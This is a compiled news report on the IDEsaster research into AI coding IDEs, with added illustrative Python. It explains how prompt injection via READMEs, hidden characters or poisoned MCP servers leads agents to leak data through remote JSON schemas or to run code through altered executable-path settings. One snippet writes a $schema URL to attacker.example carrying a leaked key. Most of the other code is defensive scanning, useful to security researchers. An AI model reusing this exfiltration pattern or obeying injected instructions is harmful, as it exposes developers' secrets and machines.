2 Sources
[1]
Critical flaws found in AI development tools dubbed an 'IDEsaster' -- data theft and remote code execution possible
New research identifies more than thirty vulnerabilities across AI coding tools, revealing a universal attack chain that affects every major AI-integrated IDE tested.

A six-month investigation into AI-assisted development tools has uncovered over thirty security vulnerabilities that allow data exfiltration and, in some cases, remote code execution. The findings, described in the IDEsaster research report, show how AI agents embedded in IDEs such as Visual Studio Code, JetBrains products, Zed, and numerous commercial assistants can be manipulated into leaking sensitive information or executing attacker-controlled code.

According to the research, 100% of tested AI IDEs and coding assistants were vulnerable. Products affected include GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code, with at least twenty-four assigned CVEs and additional advisories from AWS.

The core issue comes from how AI agents interact with long-standing IDE features. These editors were never designed for autonomous components capable of reading, editing, and generating files. When AI assistants gained these abilities, previously benign features became attack surfaces. "All AI IDEs... effectively ignore the base software... in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives," said security researcher Ari Marzouk, speaking to The Hacker News.

According to the research report, this is an IDE-agnostic attack chain, beginning with context hijacking via prompt injection. Hidden instructions can be planted in rule files, READMEs, file names, or outputs from malicious MCP servers. Once an agent processes that context, its tools can be directed to perform legitimate actions that trigger unsafe behaviors in the base IDE. The final stage abuses built-in features to extract data or execute attacker code across any AI IDE sharing that base software layer.

One documented example involves writing a JSON file that references a remote schema. The IDE automatically fetches that schema, leaking parameters embedded by the agent, including sensitive data collected earlier in the chain. Visual Studio Code, JetBrains IDEs, and Zed all exhibited this behavior. Even developer safeguards like diff previews did not suppress the outbound request.

Another case study demonstrates full remote code execution through manipulated IDE settings. By editing an executable file already present in the workspace and then modifying configuration fields such as php.validate.executablePath, an attacker can cause the IDE to immediately run arbitrary code the moment a related file type is opened or created. JetBrains tools show similar exposure through workspace metadata.

The report concludes that, in the short term, the vulnerability class cannot be eliminated because current IDEs were not built under what the researcher calls the "Secure for AI" principle. Mitigations exist for both developers and tool vendors, but the long-term fix requires fundamentally redesigning how IDEs allow AI agents to read, write, and act inside projects.
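To make the schema example concrete, the following is a minimal sketch of the kind of workspace file an agent could be induced to write; it is not taken from the report, and the attacker domain and query parameter are hypothetical. An IDE that auto-resolves JSON schemas may fetch the referenced URL, sending the embedded value to the remote server.

    import json

    # Illustration only: a JSON file whose "$schema" points at an
    # attacker-controlled server, with previously gathered data smuggled
    # into the URL's query string. The domain and keys are hypothetical.
    malicious_doc = {
        "$schema": "https://attacker.example/schema.json?leak=API_KEY_VALUE",
        "name": "innocuous-looking-config",
    }

    with open("workspace-config.json", "w") as f:
        json.dump(malicious_doc, f, indent=2)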
[2]
Researchers Uncover 30+ Flaws in AI Coding Tools Enabling Data Theft and RCE Attacks
Over 30 security vulnerabilities have been disclosed in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs) that combine prompt injection primitives with legitimate features to achieve data exfiltration and remote code execution. The security shortcomings have been collectively named IDEsaster by security researcher Ari Marzouk (MaccariTA). They affect popular IDEs and extensions such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline, among others. Of these, 24 have been assigned CVE identifiers.

"I think the fact that multiple universal attack chains affected each and every AI IDE tested is the most surprising finding of this research," Marzouk told The Hacker News. "All AI IDEs (and coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives."

At its core, the research chains three vectors common to AI-driven IDEs: context hijacking via prompt injection, the agent's own tool actions, and built-in IDE features that behave unsafely once triggered. The highlighted issues are different from prior attack chains that have leveraged prompt injections in conjunction with vulnerable tools (or abused legitimate tools to perform read or write actions) to modify an AI agent's configuration to achieve code execution or other unintended behavior. What makes IDEsaster notable is that it takes prompt injection primitives and an agent's tools, using them to activate legitimate features of the IDE to result in information leakage or command execution.

Context hijacking can be pulled off in myriad ways, including through user-added context references that can take the form of pasted URLs or text with hidden characters that are not visible to the human eye but can be parsed by the LLM. Alternatively, the context can be polluted by using a Model Context Protocol (MCP) server through tool poisoning or rug pulls, or when a legitimate MCP server parses attacker-controlled input from an external source.

Some of the attacks made possible by the new exploit chain hinge on an AI agent being configured to auto-approve file writes, which allows an attacker with the ability to influence prompts to cause malicious workspace settings to be written. Given that this behavior is auto-approved by default for in-workspace files, it leads to arbitrary code execution without any user interaction or the need to reopen the workspace.

With prompt injections and jailbreaks acting as the first step of the attack chain, Marzouk recommends that developers of AI agents and AI IDEs apply the principle of least privilege to LLM tools, minimize prompt injection vectors, harden the system prompt, use sandboxing to run commands, and perform security testing for path traversal, information leakage, and command injection.
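Tool poisoning and rug pulls of the kind described above can be made noisier with a simple integrity check. The sketch below is our illustration, not part of the research: it pins each MCP tool's advertised description at first sight and flags any later change. The tool-listing shape (a plain name-to-description mapping) is an assumption; a real MCP client exposes richer metadata.

    import hashlib
    import json
    from pathlib import Path

    PIN_FILE = Path("mcp_tool_pins.json")  # local record of trusted tool descriptions

    def fingerprint(name: str, description: str) -> str:
        """Stable hash of a tool's name and advertised description."""
        return hashlib.sha256(f"{name}\n{description}".encode("utf-8")).hexdigest()

    def check_tools(tools: dict[str, str]) -> list[str]:
        """Return tool names whose descriptions changed since they were pinned.

        `tools` maps tool name -> description text as reported by the MCP server
        (the exact shape of a real server listing will differ; this is a sketch).
        """
        pins = json.loads(PIN_FILE.read_text()) if PIN_FILE.exists() else {}
        changed = []
        for name, description in tools.items():
            fp = fingerprint(name, description)
            if name not in pins:
                pins[name] = fp          # first sighting: pin it
            elif pins[name] != fp:
                changed.append(name)     # description changed after pinning: possible rug pull
        PIN_FILE.write_text(json.dumps(pins, indent=2))
        return changed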
The disclosure coincides with the discovery of several vulnerabilities in AI coding tools that could have a wide range of impacts. As agentic AI tools become increasingly popular in enterprise environments, these findings demonstrate how AI tools expand the attack surface of development machines, often by leveraging an LLM's inability to distinguish between instructions provided by a user to complete a task and content ingested from an external source, which, in turn, can contain an embedded malicious prompt. "Any repository using AI for issue triage, PR labeling, code suggestions, or automated replies is at risk of prompt injection, command injection, secret exfiltration, repository compromise and upstream supply chain compromise," Aikido researcher Rein Daelman said.

Marzouk also said the discoveries emphasized the importance of "Secure for AI," a new paradigm coined by the researcher to tackle security challenges introduced by AI features, ensuring that products are not only secure by default and secure by design, but are also conceived keeping in mind how AI components can be abused over time. "This is another example of why the 'Secure for AI' principle is needed," Marzouk said. "Connecting AI agents to existing applications (in my case IDE, in their case GitHub Actions) creates new emerging risks."
Security researchers have uncovered over 30 vulnerabilities across every major AI-powered IDE tested, including GitHub Copilot, Cursor, and Visual Studio Code. The IDEsaster findings reveal how AI agents can be manipulated through prompt injection to leak sensitive data or execute malicious code, with 24 CVEs assigned and 100% of tested tools affected.
A six-month investigation into AI coding tools has exposed a sweeping security crisis affecting every major development platform. Security researcher Ari Marzouk uncovered over 30 security vulnerabilities that enable data exfiltration and remote code execution across AI-assisted development tools, with 100% of tested platforms found vulnerable [1][2]. The research, dubbed IDEsaster, affects widely used AI-powered Integrated Development Environments including GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least 24 CVEs have been assigned, with additional advisories issued by AWS [1].
Source: Hacker News
The core problem stems from a fundamental mismatch between traditional IDE architecture and autonomous AI capabilities. Visual Studio Code, JetBrains products, Zed, and other platforms were designed long before autonomous AI agents existed, never anticipating components capable of reading, editing, and generating files on their own. "All AI IDEs effectively ignore the base software in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives," Marzouk told The Hacker News [1]. This disconnect creates an IDE-agnostic attack chain that works across platforms sharing similar base software layers.

The IDEsaster attack chain follows a three-stage pattern common to AI coding assistants. It begins with context hijacking via prompt injection, where hidden instructions are planted in configuration files, READMEs, file names, or outputs from malicious Model Context Protocol servers [2]. These prompt injection primitives can include user-added context references with invisible characters that humans cannot see but large language models parse readily. Once an AI agent processes that poisoned context, its tools can be directed to perform seemingly legitimate actions that trigger unsafe behaviors in the underlying IDE. The final stage abuses built-in features to extract sensitive information or execute attacker-controlled code [1].
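Because one of the injection vectors is text whose malicious portion renders as nothing to a human reviewer, a simple pre-ingestion scan can flag it. The sketch below is a minimal illustration, not part of the published research: it checks pasted context for zero-width and other format-control characters before the text is handed to an agent.

    import unicodedata

    # Characters commonly used to hide instructions from human readers:
    # zero-width spaces/joiners, bidi controls, and Unicode "tag" characters.
    SUSPICIOUS = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

    def find_hidden_characters(text: str) -> list[tuple[int, str]]:
        """Return (index, codepoint name) for invisible or format-control characters."""
        hits = []
        for i, ch in enumerate(text):
            is_tag = 0xE0000 <= ord(ch) <= 0xE007F          # Unicode tag block
            is_format = unicodedata.category(ch) == "Cf"     # format controls (incl. bidi)
            if ch in SUSPICIOUS or is_tag or is_format:
                hits.append((i, unicodedata.name(ch, f"U+{ord(ch):04X}")))
        return hits

    pasted = "Fix the login bug\u200b\u200bplease"   # example input with zero-width spaces
    for index, name in find_hidden_characters(pasted):
        print(f"hidden character at {index}: {name}")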
One documented exploit involves writing a JSON file that references a remote schema. The IDE automatically fetches that schema, inadvertently leaking parameters embedded by the AI agent, including sensitive data collected earlier in the attack chain. Visual Studio Code, JetBrains IDEs, and Zed all exhibited this behavior, with even developer safeguards like diff previews failing to suppress the outbound request [1].
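One way a team could watch for this class of exfiltration is to treat any externally hosted schema reference in the workspace as suspect. The following sketch is our illustration with a hypothetical allow-list; it scans a project's JSON files for "$schema" URLs pointing outside approved hosts.

    import json
    from pathlib import Path
    from urllib.parse import urlparse

    # Hosts the team actually expects schemas to come from (hypothetical allow-list).
    ALLOWED_SCHEMA_HOSTS = {"json.schemastore.org", "schemas.internal.example.com"}

    def external_schema_refs(workspace: str) -> list[tuple[str, str]]:
        """Return (file, schema URL) pairs whose $schema points at a non-allow-listed host."""
        findings = []
        for path in Path(workspace).rglob("*.json"):
            try:
                data = json.loads(path.read_text(encoding="utf-8"))
            except (json.JSONDecodeError, UnicodeDecodeError):
                continue  # not valid JSON; skip
            schema = data.get("$schema") if isinstance(data, dict) else None
            if isinstance(schema, str) and schema.startswith(("http://", "https://")):
                host = urlparse(schema).hostname or ""
                if host not in ALLOWED_SCHEMA_HOSTS:
                    findings.append((str(path), schema))
        return findings

    for file, url in external_schema_refs("."):
        print(f"unexpected remote schema in {file}: {url}")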
Another case study demonstrates full remote code execution through manipulated IDE settings. By editing an executable file already present in the workspace and modifying configuration fields such as php.validate.executablePath, attackers can cause the IDE to immediately run arbitrary code when a related file type is opened or created [1].
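Workspace settings that name an executable are the pivot point in this case study, so they are worth auditing whenever an agent touches them. Below is a minimal sketch, not from the report, that flags executable-path style overrides in a project's .vscode/settings.json; the key list is illustrative, not exhaustive.

    import json
    from pathlib import Path

    # Settings keys that point the IDE at a binary it will run.
    # Illustrative, not exhaustive: real audits should cover extension-specific keys too.
    RISKY_KEY_SUFFIXES = ("executablepath", ".path", "interpreterpath")

    def risky_workspace_settings(workspace: str) -> list[tuple[str, str]]:
        """Return (setting key, value) pairs in .vscode/settings.json that set executable paths."""
        settings_file = Path(workspace) / ".vscode" / "settings.json"
        if not settings_file.exists():
            return []
        try:
            settings = json.loads(settings_file.read_text(encoding="utf-8"))
        except json.JSONDecodeError:
            return []  # real settings files may contain comments (JSONC); a full tool would strip them
        return [
            (key, str(value))
            for key, value in settings.items()
            if key.lower().endswith(RISKY_KEY_SUFFIXES)
        ]

    for key, value in risky_workspace_settings("."):
        print(f"review before trusting: {key} = {value}")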
Source: Tom's Hardware
As agentic AI tools gain traction in enterprise development workflows, these findings reveal how AI components fundamentally expand the attack surface of development machines. The vulnerabilities exploit an LLM's inability to distinguish between legitimate user instructions and malicious content ingested from external sources. "Any repository using AI for issue triage, PR labeling, code suggestions, or automated replies is at risk of prompt injection, command injection, secret exfiltration, repository compromise and upstream supply chain compromise," warned Aikido researcher Rein Daelman [2]. The auto-approve behavior for in-workspace file writes, enabled by default in many AI coding assistants, allows arbitrary code execution without user interaction or workspace reopening [2].
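Since the no-interaction variants of these attacks depend on configuration writes being auto-approved, one practical countermeasure is to exempt such paths from auto-approval. The sketch below illustrates that idea; the path list and the approval hook are our assumptions, not taken from any particular assistant.

    from pathlib import PurePosixPath

    # Paths whose modification should always require an explicit human decision,
    # even when other in-workspace writes are auto-approved. Hypothetical list.
    SENSITIVE_PATTERNS = (
        ".vscode/",        # VS Code workspace settings and tasks
        ".idea/",          # JetBrains workspace metadata
        ".cursor/",        # Cursor rules
        ".mcp.json",       # MCP server configuration
    )

    def requires_manual_approval(relative_path: str) -> bool:
        """True if an agent-initiated write to this workspace path should not be auto-approved."""
        normalized = PurePosixPath(relative_path).as_posix()
        return any(
            normalized.startswith(pattern) or normalized.endswith(pattern.rstrip("/"))
            for pattern in SENSITIVE_PATTERNS
        )

    # Example: a hypothetical approval hook in an agent's file-write tool.
    for candidate in (".vscode/settings.json", "src/app.py"):
        verdict = "ask the user" if requires_manual_approval(candidate) else "auto-approve"
        print(f"{candidate}: {verdict}")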
Marzouk emphasizes that short-term fixes cannot eliminate this vulnerability class because current IDEs were not built under what he calls the "Secure for AI" principle. This new paradigm ensures products are conceived with AI component abuse in mind from the start, going beyond secure-by-default and secure-by-design approaches [1][2]. Recommended mitigations include applying the principle of least privilege to LLM tools, minimizing prompt injection vectors, hardening system prompts, using sandboxing to run commands, and performing security testing for path traversal, information leakage, and command injection [2]. The long-term fix requires fundamentally redesigning how IDEs allow AI agents to read, write, and act inside projects, addressing the threat-model gap that currently treats legacy features as inherently safe despite their new autonomous context [1].
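As one concrete reading of the least-privilege advice, an agent's shell tool can be routed through a wrapper that allows only a small set of commands and strips the inherited environment. The sketch below is a simplified illustration; the command allow-list and limits are assumptions, and a real sandbox would also need filesystem and network isolation.

    import shlex
    import subprocess

    # Commands the agent is allowed to run, per the least-privilege recommendation.
    # Hypothetical allow-list; a real deployment would tailor this per project.
    ALLOWED_COMMANDS = {"ls", "cat", "grep", "pytest"}

    def run_agent_command(command_line: str) -> subprocess.CompletedProcess:
        """Run an agent-requested command with an allow-list, minimal environment, and timeout."""
        argv = shlex.split(command_line)
        if not argv or argv[0] not in ALLOWED_COMMANDS:
            raise PermissionError(f"command not permitted for the agent: {command_line!r}")
        return subprocess.run(
            argv,
            env={"PATH": "/usr/bin:/bin"},   # minimal environment: no inherited secrets such as API keys
            capture_output=True,
            text=True,
            timeout=30,                      # bound runaway commands
            check=False,
        )

    result = run_agent_command("ls -la")
    print(result.stdout)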
Summarized by Navi